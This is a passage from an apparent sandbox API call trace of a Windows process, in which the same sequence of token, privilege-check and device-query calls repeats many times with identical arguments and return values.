DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.098] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.098] SetLastError (dwErrCode=0x522) [0085.098] CloseHandle (hObject=0x114) returned 1 [0085.098] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.098] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.098] GetLastError () returned 0x578 [0085.098] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.099] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.099] GetCurrentThread () returned 0xfffffffe [0085.099] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.099] GetLastError () returned 0x3f0 [0085.099] GetCurrentProcess () returned 0xffffffff [0085.099] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.099] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.099] SetLastError (dwErrCode=0x522) [0085.099] CloseHandle (hObject=0x114) returned 1 [0085.099] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.099] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.099] GetLastError () returned 0x578 [0085.099] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.099] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.099] GetCurrentThread () returned 0xfffffffe [0085.099] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.099] GetLastError () returned 0x3f0 [0085.099] GetCurrentProcess () returned 0xffffffff [0085.099] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.099] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.099] SetLastError (dwErrCode=0x522) [0085.099] CloseHandle (hObject=0x114) returned 1 [0085.099] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.099] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.099] GetLastError () returned 0x578 [0085.099] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.099] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.099] GetCurrentThread () returned 0xfffffffe [0085.099] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.099] GetLastError () returned 0x3f0 [0085.099] GetCurrentProcess () returned 0xffffffff [0085.099] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.099] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.099] SetLastError (dwErrCode=0x522) [0085.099] CloseHandle (hObject=0x114) returned 1 [0085.099] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.100] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.100] GetLastError () returned 0x578 [0085.100] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.100] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.100] GetCurrentThread () returned 0xfffffffe [0085.100] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.100] GetLastError () returned 0x3f0 [0085.100] GetCurrentProcess () returned 0xffffffff [0085.100] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.100] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.100] SetLastError (dwErrCode=0x522) [0085.100] CloseHandle (hObject=0x114) returned 1 [0085.100] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.100] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.100] GetLastError () returned 0x578 [0085.100] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.100] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.100] GetCurrentThread () returned 0xfffffffe [0085.100] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.100] GetLastError () returned 0x3f0 [0085.100] GetCurrentProcess () returned 0xffffffff [0085.100] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.100] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.100] SetLastError (dwErrCode=0x522) [0085.100] CloseHandle (hObject=0x114) returned 1 [0085.100] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.100] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.100] GetLastError () returned 0x578 [0085.100] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.100] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.100] GetCurrentThread () returned 0xfffffffe [0085.100] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.100] GetLastError () returned 0x3f0 [0085.100] GetCurrentProcess () returned 0xffffffff [0085.100] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.100] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.101] SetLastError (dwErrCode=0x522) [0085.101] CloseHandle (hObject=0x114) returned 1 [0085.101] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.101] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.101] GetLastError () returned 0x578 [0085.101] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.101] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.101] GetCurrentThread () returned 0xfffffffe [0085.101] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.101] GetLastError () returned 0x3f0 [0085.101] GetCurrentProcess () returned 0xffffffff [0085.101] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.101] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.101] SetLastError (dwErrCode=0x522) [0085.101] CloseHandle (hObject=0x114) returned 1 [0085.101] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.101] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.101] GetLastError () returned 0x578 [0085.101] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.101] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.101] GetCurrentThread () returned 0xfffffffe [0085.101] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.101] GetLastError () returned 0x3f0 [0085.101] GetCurrentProcess () returned 0xffffffff [0085.101] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.101] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.101] SetLastError (dwErrCode=0x522) [0085.101] CloseHandle (hObject=0x114) returned 1 [0085.101] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.101] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.101] GetLastError () returned 0x578 [0085.101] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.101] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.101] GetCurrentThread () returned 0xfffffffe [0085.101] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.101] GetLastError () returned 0x3f0 [0085.101] GetCurrentProcess () returned 0xffffffff [0085.101] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.102] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.102] SetLastError (dwErrCode=0x522) [0085.102] CloseHandle (hObject=0x114) returned 1 [0085.102] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.102] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.102] GetLastError () returned 0x578 [0085.102] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.102] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.102] GetCurrentThread () returned 0xfffffffe [0085.102] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.102] GetLastError () returned 0x3f0 [0085.102] GetCurrentProcess () returned 0xffffffff [0085.102] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.102] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.102] SetLastError (dwErrCode=0x522) [0085.102] CloseHandle (hObject=0x114) returned 1 [0085.102] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.102] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.102] GetLastError () returned 0x578 [0085.102] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.102] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.102] GetCurrentThread () returned 0xfffffffe [0085.102] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.102] GetLastError () returned 0x3f0 [0085.102] GetCurrentProcess () returned 0xffffffff [0085.102] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.102] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.102] SetLastError (dwErrCode=0x522) [0085.102] CloseHandle (hObject=0x114) returned 1 [0085.102] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.102] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.102] GetLastError () returned 0x578 [0085.102] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.102] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.102] GetCurrentThread () returned 0xfffffffe [0085.102] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.103] GetLastError () returned 0x3f0 [0085.103] GetCurrentProcess () returned 0xffffffff [0085.103] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.103] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.103] SetLastError (dwErrCode=0x522) [0085.103] CloseHandle (hObject=0x114) returned 1 [0085.103] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.103] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.103] GetLastError () returned 0x578 [0085.103] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.103] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.103] GetCurrentThread () returned 0xfffffffe [0085.103] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.103] GetLastError () returned 0x3f0 [0085.103] GetCurrentProcess () returned 0xffffffff [0085.103] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.103] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.103] SetLastError (dwErrCode=0x522) [0085.103] CloseHandle (hObject=0x114) returned 1 [0085.103] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.103] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.103] GetLastError () returned 0x578 [0085.103] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.103] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.103] GetCurrentThread () returned 0xfffffffe [0085.103] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.103] GetLastError () returned 0x3f0 [0085.103] GetCurrentProcess () returned 0xffffffff [0085.103] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.103] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.103] SetLastError (dwErrCode=0x522) [0085.103] CloseHandle (hObject=0x114) returned 1 [0085.103] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.103] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.103] GetLastError () returned 0x578 [0085.103] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.104] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.104] GetCurrentThread () returned 0xfffffffe [0085.104] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.104] GetLastError () returned 0x3f0 [0085.104] GetCurrentProcess () returned 0xffffffff [0085.104] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.104] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.104] SetLastError (dwErrCode=0x522) [0085.104] CloseHandle (hObject=0x114) returned 1 [0085.104] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.104] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.104] GetLastError () returned 0x578 [0085.104] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.104] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.104] GetCurrentThread () returned 0xfffffffe [0085.104] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.104] GetLastError () returned 0x3f0 [0085.104] GetCurrentProcess () returned 0xffffffff [0085.104] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.104] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.104] SetLastError (dwErrCode=0x522) [0085.104] CloseHandle (hObject=0x114) returned 1 [0085.104] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.104] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.104] GetLastError () returned 0x578 [0085.104] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.104] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.104] GetCurrentThread () returned 0xfffffffe [0085.104] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.104] GetLastError () returned 0x3f0 [0085.104] GetCurrentProcess () returned 0xffffffff [0085.104] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.104] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.104] SetLastError (dwErrCode=0x522) [0085.104] CloseHandle (hObject=0x114) returned 1 [0085.104] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.105] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.105] GetLastError () returned 0x578 [0085.105] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.105] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.105] GetCurrentThread () returned 0xfffffffe [0085.105] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.105] GetLastError () returned 0x3f0 [0085.105] GetCurrentProcess () returned 0xffffffff [0085.105] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.105] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.105] SetLastError (dwErrCode=0x522) [0085.105] CloseHandle (hObject=0x114) returned 1 [0085.105] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.105] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.105] GetLastError () returned 0x578 [0085.105] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.105] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.105] GetCurrentThread () returned 0xfffffffe [0085.105] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.105] GetLastError () returned 0x3f0 [0085.105] GetCurrentProcess () returned 0xffffffff [0085.105] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.105] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.105] SetLastError (dwErrCode=0x522) [0085.105] CloseHandle (hObject=0x114) returned 1 [0085.105] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.105] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.105] GetLastError () returned 0x578 [0085.105] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.105] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.105] GetCurrentThread () returned 0xfffffffe [0085.105] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.105] GetLastError () returned 0x3f0 [0085.105] GetCurrentProcess () returned 0xffffffff [0085.105] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.105] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.105] SetLastError (dwErrCode=0x522) [0085.105] CloseHandle (hObject=0x114) returned 1 [0085.106] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.106] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.106] GetLastError () returned 0x578 [0085.106] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.106] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.106] GetCurrentThread () returned 0xfffffffe [0085.106] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.106] GetLastError () returned 0x3f0 [0085.106] GetCurrentProcess () returned 0xffffffff [0085.106] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.106] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.106] SetLastError (dwErrCode=0x522) [0085.106] CloseHandle (hObject=0x114) returned 1 [0085.106] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.106] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.106] GetLastError () returned 0x578 [0085.106] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.106] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.106] GetCurrentThread () returned 0xfffffffe [0085.106] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.106] GetLastError () returned 0x3f0 [0085.106] GetCurrentProcess () returned 0xffffffff 